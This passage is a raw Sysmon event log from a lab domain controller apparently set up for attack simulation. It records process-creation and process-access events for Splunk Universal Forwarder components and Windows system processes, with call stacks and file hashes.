Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.917{59A5CD1D-96AA-6005-8405-00000000A301}29606040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.761{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.762{59A5CD1D-96AA-6005-8405-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.092{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:46.090{59A5CD1D-96AA-6005-8305-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.917{59A5CD1D-96AC-6005-8605-00000000A301}14084128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.761{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.762{59A5CD1D-96AC-6005-8605-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.245{59A5CD1D-96AC-6005-8505-00000000A301}49206296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.093{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 